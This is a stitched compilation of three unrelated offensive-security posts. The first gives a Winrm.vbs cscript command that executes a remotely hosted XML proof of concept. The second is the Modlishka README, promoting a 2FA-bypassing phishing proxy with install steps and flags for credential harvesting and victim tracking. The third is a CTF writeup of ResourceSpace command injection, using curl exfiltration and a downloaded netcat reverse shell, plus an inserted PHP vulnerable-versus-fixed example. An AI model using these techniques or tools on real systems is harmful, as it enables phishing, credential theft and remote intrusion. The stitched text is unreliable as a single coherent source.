Round of use Winrm code execution XML

Original text by Matt harr0ey

Introduction
This post gives a simple overview of using Winrm.vbs to execute code from an XML file. I collected a few ideas on this method, which red teams are using more and more as Winrm.vbs gains popularity, and I found some things I did not want to delay releasing any longer.

Winrm.vbs ==> Windows Remote Management

Synopsis
WinRM is a simple service for running code or instructions on other systems from your computer over the WS-Management protocol. That remote side is not covered in this blog post; I only show local execution, but the same thing can be done remotely if you connect to a server or another computer.
Further information:
https://docs.microsoft.com/en-us/windows/desktop/winrm/about-windows-remote-management

Usage XML/Winrm.vbs
If you are hearing about XML/Winrm.vbs for the first time in this blog post, I would say: yes, the XML that winrm.vbs consumes is quite different from any other XML. Have a look at Microsoft's documentation; it gives a good description of the Winrm instructions and how to use them.

So what's the relationship between normal XML and Winrm XML?
The difference between normal XML and Winrm.vbs XML is simple: normal XML is easy to understand, whereas Winrm's XML is not, because Winrm.vbs XML uses different elements and different conventions. The picture below contains some instructions on Winrm's XML code.
MS-Windows Remote management

Small notes
It is better to run with full privileges (open as administrator). If you use a platform such as Empire, PowerShell or MSF, you can get a higher privilege level than a normal session, but don't forget to use Get-TokenPrivs:
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-TokenPrivs.ps1

The graphic above shows information that will help you understand how XML code is implemented through Winrm's XML instructions. Be careful, though: ordinary XML cannot be used by Winrm.vbs; I think only Winrm's own XML dialect and version will work.

These instructions show how to execute XML/Winrm.vbs via cscript.exe. I also found another way of executing Winrm.vbs, but it does not work on my version of Windows; it may work on Windows Server 2008 or other versions. If you have a VM running Windows Server 2008 you can use this research remotely.

This text shows remote execution; the next picture shows local execution.

cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -remote:https://gist.githubusercontent.com/homjxi0e/da3a5f4b5f48d60b156960bf27a4d164/raw/b615f853cf962566a516a320e9324fbfdcb124fc/PoCWinrm.xml

Here you can look forward to another new Winrm blog post, on detection (RedCanary).
Reference:
Lateral Movement Using WinRM and WMI
https://www.redcanary.com/blog/lateral-movement-winrm-wmi/

Modlishka — An Open Source Phishing Tool With 2FA Authentication

Original text by Lydecher black


Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).
Enjoy 🙂

Features
Some of the most important ‘Modlishka’ features:

  • Support for the majority of 2FA authentication schemes (by design).
  • No website templates (just point Modlishka to the target domain; in most cases it will be handled automatically).
  • Full control of «cross» origin TLS traffic flow from your victims' browsers.
  • Flexible and easily configurable phishing scenarios through configuration options.
  • Pattern based JavaScript payload injection.
  • Stripping the website of all encryption and security headers (back to 90’s MITM style).
  • User credential harvesting (with context based on identifiers passed as URL parameters).
  • Can be extended with your ideas through plugins.
  • Stateless design. Can be scaled up easily for an arbitrary number of users — ex. through a DNS load balancer.
  • Web panel with a summary of collected credentials and user session impersonation (beta).
  • Written in Go.

Action
«A picture is worth a thousand words»:
Modlishka in action against an example 2FA (SMS) enabled authentication scheme:

Note: google.com was chosen here just as a POC.

Installation
The latest source code version can be fetched from here (zip) or here (tar).
Fetch the code with ‘go get’:


$ go get -u github.com/drk1wi/Modlishka

Compile the binary and you are ready to go:


$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make

# ./dist/proxy -h


Usage of ./dist/proxy:
     
  -cert string
     base64 encoded TLS certificate
 
  -certKey string
     base64 encoded TLS certificate key
 
  -certPool string
     base64 encoded Certification Authority certificate
 
  -config string
     JSON configuration file. Convenient instead of using command line switches.
 
  -credParams string
       Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)

  -debug
     Print debug information
 
  -disableSecurity
     Disable security features like anti-SSRF. Disable at your own risk.
 
  -jsRules string
     Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
 
  -listeningAddress string
     Listening address (default "127.0.0.1")
 
  -listeningPort string
     Listening port (default "443")
 
  -log string
     Local file to which fetched requests will be written (appended)
 
  -phishing string
     Phishing domain to create - Ex.: target.co
 
  -plugins string
     Comma seperated list of enabled plugin names (default "all")
 
  -postOnly
     Log only HTTP POST requests
 
  -rules string
     Comma separated list of 'string' patterns and their replacements.
 
  -target string
     Main target to proxy - Ex.: https://target.com
 
  -targetRes string
     Comma separated list of target subdomains that need to pass through the  proxy
 
  -terminateTriggers string
     Comma separated list of URLs from target's origin which will trigger session termination
 
  -terminateUrl string
     URL to redirect the client after session termination triggers
 
  -tls
     Enable TLS (default false)
 
  -trackingCookie string
     Name of the HTTP cookie used to track the victim (default "id")
 
  -trackingParam string
     Name of the HTTP parameter used to track the victim (default "id")

Usage

  • Check out the wiki page for a more detailed overview of the tool usage.
  • FAQ (Frequently Asked Questions)
  • Blog post

Credits
Thanks for helping with the code go to Giuseppe Trotta (@Giutro)

Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of ResourceSpace was 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commit logs to find juicy commit messages like this one:

Commit logs

Looking at the diff view for this commit reveals the vulnerable entry point: in the “/plugins/pdf_split/pages/pdf_split.php” page, user input is passed to the run_command() function:

Git diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semicolon character thus terminates the command line, allowing us to execute arbitrary commands on the web server. However, as we don't have directly visible output, we need an HTTP server such as the Burp Collaborator listening for incoming requests.
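As an added illustration of the bug class described above (hypothetical code, not ResourceSpace's actual pdf_split.php or run_command(), with a placeholder tool name and parameter names), here is the vulnerable concatenation pattern beside the escapeshellarg() hardening the fix commit applies, plus an input-validation check as defence in depth:

```php
<?php
// Hypothetical illustration of the pdf_split command-injection pattern.
// Not ResourceSpace's real code; "pdf_split_tool" and the parameters are placeholders.

// Vulnerable pattern: request values are concatenated straight into a shell line,
// so a ';' in either value ends the intended command and starts a new one.
function build_split_command_vulnerable(string $pdf, string $page): string
{
    return "pdf_split_tool --page $page $pdf";
}

// Hardened pattern, as in the fix commit: every user-controlled value is wrapped
// in escapeshellarg(), which single-quotes it so the shell sees one literal argument.
function build_split_command_fixed(string $pdf, string $page): string
{
    return 'pdf_split_tool --page ' . escapeshellarg($page) . ' ' . escapeshellarg($pdf);
}

// Defence in depth: reject anything that is not a page number before it gets near a shell.
function validated_page(string $page): int
{
    if (!ctype_digit($page) || (int) $page < 1) {
        throw new InvalidArgumentException('page must be a positive integer');
    }
    return (int) $page;
}

// Constructed hostile input of the shape the writeup describes.
$hostile = '1; id';

// The vulnerable builder yields two shell commands; the fixed one yields a
// single quoted argument that the tool itself will reject as a page number.
echo build_split_command_vulnerable('in.pdf', $hostile), PHP_EOL;
echo build_split_command_fixed('in.pdf', $hostile), PHP_EOL;

// The validator stops the request before any command is built at all.
try {
    validated_page($hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```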

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag